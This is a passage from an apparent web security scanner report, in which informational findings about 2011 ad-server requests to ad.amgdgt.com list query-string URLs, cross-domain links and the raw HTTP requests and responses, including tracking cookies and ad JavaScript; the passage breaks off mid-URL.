Date: Mon, 13 Jun 2011 12:01:12 GMT

_353456_amg_acamp_id=176032;
_353456_amg_pcamp_id=80456;
_353456_amg_location_id=64936;
_353456_amg_creative_id=353456;
_353456_amg_loaded=true;
var _amg_353456_content='<script language="Javascript">
...[SNIP]...
</script><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=80456&c5=176032&c6=&cv=1.3&cj=1&rn=2044145600" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_353456_content);

18.16. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=5112&pl=bb7d104a&rnd=44760608184151350&clkurl=http://ib.adnxs.com/click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQDDt_uSc0dlA_ayDGovBdy9k8vVNAAAAAIwuAAC1AAAAlgIAAAIAAABI9AUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAVg8BAgUCAQQAAAAAMRyqCgAAAAA./cnd=!bwXLLQjc3gQQyOgXGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIMO8ZPL1Tb7fA6bQlQeO5eG4CNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADEgAaGpqaby8Tdx_EB%26num%3D1%26sig%3DAGiWqtyHVYXRoXlyo1Kcuh3kinsbM7Wk2Q%26client%3Dca-pub-7494156027018342%26adurl%3D

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=79700&c5=177991&c6=&cv=1.3&cj=1&rn=1145369904
http://servedby.adxpose.com/adxpose/find_ad.js

Request

GET /ads/?t=i&f=j&p=5112&pl=bb7d104a&rnd=44760608184151350&clkurl=http://ib.adnxs.com/click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQDDt_uSc0dlA_ayDGovBdy9k8vVNAAAAAIwuAAC1AAAAlgIAAAIAAABI9AUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAVg8BAgUCAQQAAAAAMRyqCgAAAAA./cnd=!bwXLLQjc3gQQyOgXGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIMO8ZPL1Tb7fA6bQlQeO5eG4CNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADEgAaGpqaby8Tdx_EB%26num%3D1%26sig%3DAGiWqtyHVYXRoXlyo1Kcuh3kinsbM7Wk2Q%26client%3Dca-pub-7494156027018342%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003305&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964003248&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=3&dtd=12&xpc=7SXqZNuALm&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUYJ.IVY.vv4.gza26C7H7gikEhXMDA3gBY2BgYGRgynjEwPL0FwOj2ioGhnv5DAwMnEBhA5kbqsuBbDDw_RoMFpWvZJRhZGBg2cAoCqTSp4J5iicYuYG85UvBgus8wJTUEkZ.oOCic4xAGxiW1TMKAilGg44tO6wgRgIAPNsUwA--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUjjRQ65y9IYH2uKGOG2rEQF9A2CgDA3gBY2Bg4GBg2u7OwOqZzMBoHsLA8MuMgYGBk4GB0aDjwMPJDEwTQxlYbUUYGLWeMjC8vweX238qk4Fp310GVrv5DIz2RxgYmYB6ofr2H7mHW9.ul7j1bf3FwDT9BwOr2woGRr3VDAyfPsPN3PWTE6c7dz17xcCU8YiB5ekvBka1VQwM9_Jh.mRuqC4Hsplw6t2txYvTzt2qukC9DL5fgxkYuBkY5CsZZRgZGFg2MIoCKQYDRgYWBob0qWBBxROM3EDBhQcYGYDU8qVgJes8wJTUEkZ.oOCic2C5ZfWMgkAeNHhB5jMAAC0KVBY-; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:26:40 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2359
Date: Mon, 13 Jun 2011 11:26:39 GMT

_346467_amg_acamp_id=177991;
_346467_amg_pcamp_id=79700;
_346467_amg_location_id=64054;
_346467_amg_creative_id=346467;
_346467_amg_loaded=true;
var _amg_346467_content='<script type="text/javascript"
...[SNIP]...
</script>\n'+
'<script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=79700&c5=177991&c6=&cv=1.3&cj=1&rn=1145369904" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_346467_content);

18.17. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=5112&pl=bdb7a129&rnd=65686683612875640&clkurl=http://ib.adnxs.com/click/rUfhehSu7z-uR-F6FK7vPwAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQMJy0gu0e6hq_ayDGovBdy9v-PVNAAAAAIwuAAC1AAAAlgIAAAIAAABMSAYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAXA8BAgUCAQQAAAAAbSKPUgAAAAA./cnd=!pARxJQi9gwUQzJAZGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBBmNRbvj1TbHWO-_LsQenpbztBNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALeB8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAaGpqaby8Tdx_EB%26num%3D1%26sig%3DAGiWqtz6jFSI2BwglDLlvmtE5oz1KzkR8g%26client%3Dca-pub-7494156027018342%26adurl%3D

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=80572&c5=177998&c6=&cv=1.3&cj=1&rn=332870251
http://servedby.adxpose.com/adxpose/find_ad.js

Request

GET /ads/?t=i&f=j&p=5112&pl=bdb7a129&rnd=65686683612875640&clkurl=http://ib.adnxs.com/click/rUfhehSu7z-uR-F6FK7vPwAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQMJy0gu0e6hq_ayDGovBdy9v-PVNAAAAAIwuAAC1AAAAlgIAAAIAAABMSAYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAXA8BAgUCAQQAAAAAbSKPUgAAAAA./cnd=!pARxJQi9gwUQzJAZGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBBmNRbvj1TbHWO-_LsQenpbztBNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALeB8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAaGpqaby8Tdx_EB%26num%3D1%26sig%3DAGiWqtz6jFSI2BwglDLlvmtE5oz1KzkR8g%26client%3Dca-pub-7494156027018342%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983550&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965550231&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307965550274&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1455171707&ga_fc=1&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=102&xpc=dku4JBfkuZ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUOS66Ofqpw1kB9Sv4EYgUwhO_gWgDA3gBY2BgYGdgmhjKwGorwsCo9ZSB4f09BgYGTgYGRoOO_acyGZj23WVgtZvPwGh_hIGRKQQhd.Qebn27XuLWt_UXA9P0HwysbisYGPVWMzB8.gw3c9dPTgam7e4MrJ7JDIzmQLt.mSHknr1iYMp4xMDy9BcDo9oqBoZ7.TA5mRuqy4FsJpx6d2vx4rRzt6ouUC.D79dgBgZuBgb5SkYZRgYGlg2MokCKwYCRgZmBIX0qWFDxBCM3UHDhAUYGILV8KVjJOg8wJbWEkR8ouOgcWG5ZPaMgkAcNQpD5DAD1V01v

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUHUB8OgnDZdZnbRljKPeKt7neyMcDA3gBY2Bg4GBg2u7HwOoZwsBotYeB4R8nAwMDEDMadFyqu8rANDGUgdVWhIFR6ykDw_t7cLn9pzIZmPbdZWC1m8_AaH.EgZEpBCF35B5ufbte4ta39RcD0_QfDKxuKxgY9VYzMHz6DDdz109OoDvdge5MZmA0B9r1ywwh9.wVA1PGIwaWp78YGNVWMTDcy4fJydxQXQ5kM.HUu1uLF6edu1V1gXoZfL8GMzBwMzDIVzLKMDIwsGxgFAVSDAaMDCwMDOlTwYKKJxi5gYILDzAyAKnlS8FK1nmAKakljPxAwUXnwHLL6hkFgTxo8ILMZwAAbIxUMg--; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:45:54 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2358
Date: Mon, 13 Jun 2011 11:45:54 GMT

_346452_amg_acamp_id=177998;
_346452_amg_pcamp_id=80572;
_346452_amg_location_id=65033;
_346452_amg_creative_id=346452;
_346452_amg_loaded=true;
var _amg_346452_content='<script type="text/javascript"
...[SNIP]...
</script>\n'+
'<script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=80572&c5=177998&c6=&cv=1.3&cj=1&rn=332870251" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_346452_content);

18.18. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=4703&pl=fa97e43d&rnd=43329508136957880&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUhJR1Q9cf2Pn7ZEQLEy_iRpq7FFpnZW8sdXNhLHQsMTMwNzk2OTUzNjM2NyxjLDM0NjQ2OCxwYyw3OTcwMSxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL3BIQTlDdGVqRWtDa2NEMEsxNk1TUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRSUxsMDhvUUdIWnNfYXlER292QmR5XzlCX1pOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSjlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0F6QzFnQUFRMEJBZ1VDQVFRQUFBQUExQjhkTWdBQUFBQS4vY25kPSFjQVhVTFFqYzNnUVF5ZWdYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJHcEFqX0FmMlRkNzhPdVBMc1FlWnVNQ0NETmZxLU5NQmw2R1U3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ2pNd01IZ3lOVEJmWVhQSUFRbmFBU0JvZEhSd09pOHZkM2QzTG5SM1lXTnJiR1V1WTI5dEwyaGxZV1JzYVc1bGM1Z0N0Q1RBQWdUSUFvWFN6d3FvQXdIb0E0Z0M2QVBUS2VnRHRRam9BeFQxQXdBQUFNQ0FCdEd4bVpxS2s0M2tRUSZudW09MSZzaWc9QUdpV3F0d0hyaFU0NEswLVRwYjA3WGp0Q3ZGSmFsVnhKdyZjbGllbnQ9Y2EtcHViLTc0OTQxNTYwMjcwMTgzNDImYWR1cmw9Cg--/clkurl=

The response contains the following links to other domains:

http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10;sz=300x250;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUKgC7SkJAurVkIG6ypvqgo9ZQkHdnZW8sdXNhLHQsMTMwNzk2OTUzODM0NixjLDM0NTc3MCxwYyw3NzQ4MixhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk0LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVoSlIxUTljZjJQbjdaRVFMRXlfaVJwcTdGRnBuWlc4c2RYTmhMSFFzTVRNd056azJPVFV6TmpNMk55eGpMRE0wTmpRMk9DeHdZeXczT1Rjd01TeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDNCSVFUbERkR1ZxUld0RGEyTkVNRXN4TmsxVFVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSU1V4c01EaHZVVWRJV25OZllYbEVSMjkyUW1SNVh6bENYMXBPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU2psQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZEZDBJdFowRjZRekZuUVVGUk1FSkJaMVZEUVZGUlFVRkJRVUV4UWpoa1RXZEJRVUZCUVM0dlkyNWtQU0ZqUVZoVlRGRnFZek5uVVZGNVpXZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSkhjRUZxWDBGbU1sUmtOemhQZFZCTWMxRmxXblZOUTBORVRtWnhMVTVOUW13MlIxVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTJwTmQwMUlaM2xPVkVKbVdWaFFTVUZSYm1GQlUwSnZaRWhTZDA5cE9IWmtNMlF6VEc1U00xbFhUbkppUjFWMVdUSTVkRXd5YUd4WlYxSnpZVmMxYkdNMVowTjBRMVJCUVdkVVNVRnZXRk42ZDNGdlFYZEliMEUwWjBNMlFWQlVTMlZuUkhSUmFtOUJlRlF4UVhkQlFVRk5RMEZDZEVkNGJWcHhTMnMwTTJ0UlVTWnVkVzA5TVNaemFXYzlRVWRwVjNGMGQwaHlhRlUwTkVzd0xWUndZakEzV0dwMFEzWkdTbUZzVm5oS2R5WmpiR2xsYm5ROVkyRXRjSFZpTFRjME9UUXhOVFl3TWpjd01UZ3pOREltWVdSMWNtdzlDZy0tL2Nsa3VybD0K/clkurl=;ord=541949523?
http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=77482&c5=169976&c6=&cv=1.3&cj=1&rn=1369418474

Request

GET /ads/?t=i&f=j&p=4703&pl=fa97e43d&rnd=43329508136957880&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUhJR1Q9cf2Pn7ZEQLEy_iRpq7FFpnZW8sdXNhLHQsMTMwNzk2OTUzNjM2NyxjLDM0NjQ2OCxwYyw3OTcwMSxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL3BIQTlDdGVqRWtDa2NEMEsxNk1TUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRSUxsMDhvUUdIWnNfYXlER292QmR5XzlCX1pOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSjlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0F6QzFnQUFRMEJBZ1VDQVFRQUFBQUExQjhkTWdBQUFBQS4vY25kPSFjQVhVTFFqYzNnUVF5ZWdYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJHcEFqX0FmMlRkNzhPdVBMc1FlWnVNQ0NETmZxLU5NQmw2R1U3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ2pNd01IZ3lOVEJmWVhQSUFRbmFBU0JvZEhSd09pOHZkM2QzTG5SM1lXTnJiR1V1WTI5dEwyaGxZV1JzYVc1bGM1Z0N0Q1RBQWdUSUFvWFN6d3FvQXdIb0E0Z0M2QVBUS2VnRHRRam9BeFQxQXdBQUFNQ0FCdEd4bVpxS2s0M2tRUSZudW09MSZzaWc9QUdpV3F0d0hyaFU0NEswLVRwYjA3WGp0Q3ZGSmFsVnhKdyZjbGllbnQ9Y2EtcHViLTc0OTQxNTYwMjcwMTgzNDImYWR1cmw9Cg--/clkurl= HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307987532&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969532138&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307969532175&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1691895108&ga_fc=1&u_tz=-300&u_his=23&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=114&xpc=7VyOei7CI6&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUGV3QELJBi.aSmpvB5xwfCz8vAu0DA3gBdZLPS1RRFMc_5zJPRiQmoTYxILNwFgNjIpKRWLjRaVEQOX_BCCXEuJawaCNTSSAUQRt_4DiS0hgYgRPqwoW0cCEEgjiEoDAGCo1lPjU6vmbeW727Ofeez_2e8z3cC1zEfO7Gut2LtCXBbgNqQZqfhzrTmNE01r2PSMsS_E5XWaZ0OIDJDis7Qlqn4OiHxw5eYWYfYaWiyPXHcFrjsu9DQUx.DKt3DrmRgLNpjz0LY96l1MsgcvUFlLXnfy.Zzf04Zn5N2UukPQ9_Dz1WimDenmB1ZZGmefh56rL1odc6313V9Wi_L6rT2So11598w4wksTouIbEdOCi6bOlrH2ZxC.vmKHJrBTE9Hlsp.usWSv66T7b6_KM.p9XnjPosuzUXjmsr75DSd9Be9jWP7e5hHm4T2LGR6Hso9ldZeKMxp3vjqy3ELvj2LDTGVcudX_ehDhoGJCwQmJPLGmgWgvDgjZOMrEqdJseXBQ25rHPlQ8IJVyYlpMmJNYdNPZV6PTnf59ymrn8Lt4rk

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUNzYaM6N.twRg0X2UQxJXNBlM_ooDA3gBdZLfS5NhFMc_58E3NkSGUDcyiF3oxWAmES2MEm9qu0gQt79ggwpkXYtUdDOWRSAYQjezaG5Y.AMmwhbpxS6iCy.EIJBGBAYzaOCv1Vriab3uvdrVeZ7zeb7nnC_nAboxs7.wbiwg_Quwtwe4QQYee8J.zNpNrHAcCUahHnTYcAKTTmCNriAX1.EoccpSlYMJTOapshpyaR5qPxxWfYZ5O44V60OuTELjTIt9TbowS3NY8WVkMAR_cw575MW8iOks95ELU7CvPf_Pmdr.GcDkN5U9Qa4uwfGBwyo.9fdH_WXUX179NVpsKzmj_kZUF9F.71Snvu2aWw8.YaajWNfOIv4dqJZbbP3jXcz7L1jX08hQCTERh5XK7XWFSnvdat3eQ07nfKNz7rdqFn677T3EdA_aq37ZYd93MXe.0bFTR_p0f.V7p8z7uTerZ9NWW_R3te1Z7A2olluHY9AJ5yfEK9CxLOc0MCC44PbzZtL3QTo1.XJD0JDNNJ8shpqh57V4NPlqs8nmH0q33uyv9a8.JwGGkTA-; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 12:52:18 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2181
Date: Mon, 13 Jun 2011 12:52:17 GMT

_345770_amg_acamp_id=169976;
_345770_amg_pcamp_id=77482;
_345770_amg_location_id=62194;
_345770_amg_creative_id=345770;
_345770_amg_loaded=true;
var _amg_345770_content='<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10;sz=300x250;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUKgC7SkJAurVkIG6ypvqgo9ZQkHdnZW8sdXNhLHQsMTMwNzk2OTUzODM0NixjLDM0NTc3MCxwYyw3NzQ4MixhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk0LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVoSlIxUTljZjJQbjdaRVFMRXlfaVJwcTdGRnBuWlc4c2RYTmhMSFFzTVRNd056azJPVFV6TmpNMk55eGpMRE0wTmpRMk9DeHdZeXczT1Rjd01TeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDNCSVFUbERkR1ZxUld0RGEyTkVNRXN4TmsxVFVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSU1V4c01EaHZVVWRJV25OZllYbEVSMjkyUW1SNVh6bENYMXBPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU2psQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZEZDBJdFowRjZRekZuUVVGUk1FSkJaMVZEUVZGUlFVRkJRVUV4UWpoa1RXZEJRVUZCUVM0dlkyNWtQU0ZqUVZoVlRGRnFZek5uVVZGNVpXZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSkhjRUZxWDBGbU1sUmtOemhQZFZCTWMxRmxXblZOUTBORVRtWnhMVTVOUW13MlIxVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTJwTmQwMUlaM2xPVkVKbVdWaFFTVUZSYm1GQlUwSnZaRWhTZDA5cE9IWmtNMlF6VEc1U00xbFhUbkppUjFWMVdUSTVkRXd5YUd4WlYxSnpZVmMxYkdNMVowTjBRMVJCUVdkVVNVRnZXRk42ZDNGdlFYZEliMEUwWjBNMlFWQlVTMlZ